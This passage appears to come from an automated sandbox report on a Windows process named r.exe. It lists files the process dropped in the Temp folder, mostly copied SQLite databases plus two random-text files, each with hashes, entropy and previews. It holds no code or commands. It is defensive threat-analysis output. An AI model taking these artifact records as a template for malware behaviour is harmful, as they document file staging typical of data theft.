Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\Temp\tmp2CC3.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\r.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\Temp\tmp2CC4.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\r.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701757898321461
Encrypted:	false
SSDEEP:	24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
MD5:	520219000D5681B63804A2D138617B27
SHA1:	2C7827C354FD7A58FB662266B7E3008AFB42C567
SHA-256:	C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
SHA-512:	C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
Malicious:	false
Preview:	VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

C:\Users\user\AppData\Local\Temp\tmp3890.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\r.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp38A1.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\r.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp38B1.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\r.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp38D1.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\r.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp38E2.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\r.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp3AF.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\r.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp3BF.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\r.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp3D0.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\r.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp3E1.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\r.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp3F1.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\r.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp411.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\r.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp624D.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\r.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp625D.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\r.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp626E.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\r.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp626F.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\r.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp6280.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\r.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp6290.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\r.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp62A1.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\r.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp62B2.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\r.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp9897.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\r.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp98A8.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\r.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
